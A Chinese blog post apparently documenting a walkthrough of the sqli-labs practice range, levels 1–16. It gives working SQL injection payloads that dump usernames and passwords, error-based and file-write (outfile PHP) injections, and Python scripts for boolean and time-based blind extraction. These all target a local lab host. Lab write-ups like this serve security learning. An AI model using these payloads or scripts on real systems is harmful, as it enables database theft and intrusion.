Sqlilabs靶场less1-less16

于 2024-07-28 21:00:49 发布
阅读量593 收藏 23
点赞数 10
文章标签: sql 数据库 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75212313/article/details/140756204
版权

less1

首先先尝试单引号闭合

发现有报错,应该有注入点

可以继续用1=1试试

?id=1'and 1=1 --+

回显正常,可以猜字段了

?id=1'order by 4--+

3回显正常,4报错,直接联合查询

?id=1'union select 1,2,3--+

回显正常,应该是id=1正常回显了,payload并没有回显,只要让前面的不回显就好了,改为id=-1

?id=-1'union select 1,2,3--+

发现回显位,直接爆库名

?id=-1'union select 1,user(),database()--+

通过mysql默认库爆表名

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users';-- +

爆数据

?id=-1' union select 1,2,group_concat(username ,0x7e, password) from users--+

less2

这关是数字型注入单引号都不用闭合

[<http://192.168.88.135/sqllab/sqlmaster/Less-2/?id=1>](<http://192.168.88.135/sqllab/sqlmaster/Less-3/?id=1>) and 1=2--+

剩余解法与第一关相同

less3

这一关在闭合语句的时候用到了括号

<http://192.168.88.135/sqllab/sqlmaster/Less-3/?id=1>')and 1=2--+

剩余解法与第一关相同

less4

这关使用了双引号加括号用来闭合语句

<http://192.168.88.135/sqllab/sqlmaster/Less-4/?id=1>") and 1=2--+

less5

这里报错并没有回显

http://192.168.88.135/sqllab/sqlmaster/Less-5/?id=1'and 1=2--+

可以尝试报错注入

http://192.168.88.135/sqllab/sqlmaster/Less-5/?id=-1'union select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+

less6

双引号闭合,和less5一样,报错注入

[<http://192.168.88.135/sqllab/sqlmaster/Less-5/?id=-1>"union](<http://192.168.88.135/sqllab/sqlmaster/Less-5/?id=-1%27union>) select 1,extractvalue(1,concat(0x7e,(select database()))),3 --+

less7

双引号闭合,根据提示要用到outfile,基本上实战无法完成,原因有三:

  1. outfile的作用为导出,依靠这个参数,但这个参数为none不让你导出,除非对方项目有需求进行过更改不然此漏洞无法生效,还有一个重要的点,我们压根不知道对方的网站物理路径
  2. secure_file_priv=必须为空ini文件
  3. 修改ini文件就要root权限,有root权限我们为什么还要破漏洞?
?id=-1')) union select 1,2,'<?php phpinfo();?>' into outfile "E:\\\\PHP\\\\phpan\\\\phpstudy_pro\\\\Extensions\\\\MySQL5.5.29"--+

less8

但是和上一关一样,没有回显,尝试报错注入还是没有回显,应该是函数被过滤

语句正确是ur in ……,语句不正确没有回显,考虑布尔盲注

我们知道s的ASCII值为115,那我们就可以输入判断真假

<http://192.168.88.135/sqllab/sqlmaster/Less-8/?id=1>' and ascii(substr(database(),1,1))>100--+

那我们就可以一点一点去猜,从第一个字段往后,但是耗时耗力 ,于是用python写个脚本


import requests
import time
 
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and ascii(substr(database(),%d,1))> %d-- " % (i, mid)
            params = {"id":payload}
            r = requests.get(url, params=params)
            if 'You are in...........' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)    
        print(name)
 
if __name__ == "__main__":
    url = '<http://192.168.88.135/sqllab/sqlmaster/Less-8/index.php>'
    inject_database(url)

爆出数据库名

less9

和less8一样,但是对错都没有区别了,可以试试时间盲注,利用python脚本

import requests
import time
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            payload = "1' and if(ascii(substr(database(),%d,1))>%d, sleep(2), 0)-- " % (i, mid)
            params = {"id":payload}
            start_time = time.time()
            r = requests.get(url, params=params)
            end_time = time.time()
            if end_time - start_time >= 1:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
 
if __name__ == "__main__":
    url = 'http://127.0.0.1/sqli/Less-9/index.php'
    inject_database(url)

less10

和第九关一样,只不过闭合变成双引号了

less11

提交方式变了,变为post提交,步骤与第一关相同

less12

闭合方式变为括号,和上一关没区别

less13

闭合方式变为单引号加括号,和上一关没区别

less14

闭合方式变为双音号,和上一关没区别

less15

没有回显数据,报错注入也不行,考虑盲注

成功的语句

admin1*' and ascii(substr(database(),1,1))>100#*

失败的语句

admin1*' and ascii(substr(database(),1,1))>120#*

利用脚本

import requests
import time
def inject_database(url):
    name = ''
    for i in range(1, 20):
        low = 32
        high = 128
        mid = (low + high) // 2
        while low < high:
            data = {
                "uname" : "admin1' and ascii(substr(database(),%d,1))>%d#" % (i, mid),
                "passwd" : 'aaaaaaa'
            }
            r = requests.post(url, data=data)
            if 'flag.jpg' in r.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) // 2
        if mid == 32:
            break
        name += chr(mid)
        print(name)
 
if __name__ == "__main__":
    url = 'http://192.168.88.135/sqllab/sqlmaster/Less-15//index.php'
    inject_database(url)

less16

闭合方式改变,变为”),其余和less15一样

ErenUNO
关注
  • 10
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-labs靶场Less-7
songling515010475的专栏
08-21 331
备注:虽然从首页进来就知道是dump into outfile但我还是假设按不知道的流程来一步步尝试,这样才会印象深刻,不然我觉得失去练习的意义了。 1、访问首页,/Less-7/index.php?id=1,这里的传参点是id 探测五步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 这里我还是按原因来的先探测五步走一遍,结果发现只有两种结果如下: 结果1: 结果2: 分析:这里我尝试不管是怎么样,通过...
sqli-labs靶场 Less-1(详细版)
m0_57671135的博客
05-29 172
还是只显示正常数据(显示位有限,优先显示前边显示为结果,后边自己添加的查询结果没有任何显示),接下来让前边查询不出来。id=-1' union select 1,2,3--+ (或给一个条件为假?
sqlilabs过关 less2-less9
wcl20010的博客
05-10 403
Mysql基础知识以及入门sqlilabs靶场 less1_ProofM的博客-CSDN博客 第一篇对整个流程有较为详细的分析,这里总结一下就开始第二关 首先是确定参数是什么,这里是id ?id=1 and 1=1 -- -//1=2 判断是否是数值型注入。看页面的显示 ?id=1' " ) ') ") //这是尝试判断字符型的注入。有具体的回显那就看回显的报错,构造闭合 数值型的整个流程: /?id=-1 order by 3 -- -判断列数 /?id=-1 union se
SQLI-labs靶场Less1-37详细学习记录(7400字总结)
身高两米不到的博客
04-16 3667
最近突发奇想,想把之前做过的靶场进行归纳,给自己一个交代给他人一份借鉴,于是就把sqli-labs靶场作为第二篇总结拿来祭笔。 第一关 前十关去年在知乎写过,再次修整一番。题目提示输入ID进行get传参,但需要注意的是这个靶场貌似是不区分大小写的,使用大写ID进行传参是没有任何回显的,只有输入id才可以传参,这点需要注意。 '报错 如果使用 # 注释不起作用。采用%23或者--+注释都可以#注释,order by爆字段数,4时报错,发现三个字段 union联合查询,判断回显点进行注入,..
sqli-labs靶场Less-9
songling515010475的专栏
08-25 154
1、访问首页,/Less-9/index.php?id=1,这里的传参点是id 探测六步 判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注 http://192.168.60.142:8080/sqlilabs/Less-9/index.php?id=1 ' and sleep(10)-- qwe 分析:通过测试,这里是通过单引号闭合,同时使用延时注入才生效,哪么在以后SQL注入探测时,当前面5.
详细sqli-labs(1-65)通关讲解
热门推荐
dreamthe的博客
05-17 14万+
​ 如果刚开始接触sql注入,那么sqli-labs这个靶场会很适合你,里面包含了很多的情景,以及我们在sql注入的时候遇到的阻碍。本章将1-65关重点关卡进行详细讲解。代码基本上很全。如果靶场练习完了可以看我这篇SQL注入总结会更好掌握。​SQL注入非常详细总结_糊涂是福yyyy的博客-CSDN博客_sql注入数据包 ​...
Sqli-labs靶场第11关详解[Sqli-labs-less-11]
m0_73615178的博客
02-24 1252
SQL注入的三个条件:①参数可控;(从参数输入就知道参数可控)②参数过滤不彻底导致恶意代码被执行;(需要在测试过程中判断)③参数带入数据库执行。(从网页功能能大致分析出是否与数据库进行交互)利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-
​Sqli-labs靶场第9关详解[Sqli-labs-less-9]
m0_73615178的博客
02-24 1653
利用 order by 来测列数测显位:mysql用1,2,3,4Mysql获取相关数据:一、数据库版本-看是否认符合information_schema查询-version()二、数据库用户-看是否符合root型注入攻击-user()三、当前操作系统-看是否支持大小写或文件路径选择-@@version_compile_os四、数据库名字-为后期猜解指定数据库下的表,列做准备-database()SQL注入-时间型盲注(Time-based blind)
[靶场] SQLi-Labs Less62-Less69
3hex的博客
10-28 479
66.Less62 请求方式 注入方式 备注 GET 盲注 130次语句以内完成 http://127.0.0.1:8003/Less-62/?id=1 http://127.0.0.1:8003/Less-62/?id=-1') or 1 --+ http://127.0.0.1:8003/Less-62/?id=-1') or (select 1)<0 --+ 67.Less63 请求方式 注入方式 备注 GET 盲注
phpstudy+靶场sqli-labs-master下载
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
mysql注入-sqlilabs靶场注入
10-15
本教程基于SQLiLabs靶场,将深入探讨MySQL注入的各种技术和防御策略。 SQLiLabs是专门为学习和实践SQL注入技能设计的一个在线平台,它包含了多个级别,每个级别代表一个特定的注入场景,逐步提高难度。通过完成这些...
sqli-labs靶场练习笔记
11-09
sqli-labs靶场练习笔记,里面有2关 3关 4关 5关 4关 7关 8关 9关 11关 12关 13关 14关 15关 16关 17关 18关 19关 20关 21关 22关 23关 24关 的练习内容,可以供给初学sql注入的学者参考
sqli-labs靶场
02-12
sqli-labs靶场
【SQL 新手教程 1/20】SQL语言&MySQL数据库 简介
哒哒哒哒 哒哒
07-25 361
访问和处理关系数据库的计算机标准语言。💗 为什么需要数据库?⭐ 专门管理数据,应用程序不需要自己管理数据,而是通过数据库软件提供的。
会Excel就会sql?
svygh123的专栏
07-20 1350
以上就是通过具体的例子来说明Excel中对应的操作,以便更好地对比SQL,通过这些步骤,你可以直观地在Excel中实现类似数据库操作的功能,SQL就像是数据库世界的Excel,但它更加强大,适用于大规模数据处理和复杂的数据关系管理。虽然开始时可能会觉得SQL语法有些抽象,但一旦掌握了基础,你会发现它非常高效且强大,特别是在处理大量数据和执行复杂查询时。就像在Excel中一样,实践中学习SQL会更加有效,尝试编写一些简单的查询,逐渐增加难度,你会很快上手的!
[Vulnhub] Acid-Reloaded SQLI+图片数据隐写提取+Pkexec权限提升+Overlayfs权限提升
07-25 468
#SQLI #图片数据隐写文件提取 #Binwalk #Foremost #Pkexec权限提升 #Overlayfs权限提升
Mybatis(四)特殊SQL的查询:模糊查询、批量删除、动态设置表明、添加功能获取自增的主键
最新发布
m0_73864806的博客
07-26 409
不适用#{ },’%?%‘ 问号是属于字符串的一部分 不会被解析成占位符,会被当作是我们字符串的一部分来解析,所以我们执行的语句中找不到占位符,但是我们却为占位符进行了赋值,所以说就会报错。#{ } 还是不使适用,会产生 ' ' ,动态设置表名的时候不可以带 ' '#{ } 在sql语句中被解析之后本身就会加上一个单引号 ' '我们使用${ } ,将#{}替换成${ }不可以使用#{} 需要使用${ }使用字符串拼接的方法。字符串 日期 字段名。
sqlilabs靶场搭建
08-31
你可以按照以下步骤搭建Sqlilabs靶场: 1. 首先,需要安装一个基于Apache服务器和MySQL数据库的Web应用程序环境。你可以使用XAMPP或者WAMP等集成环境,也可以自行安装Apache、MySQL和PHP。 2. 下载Sqlilabs的代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值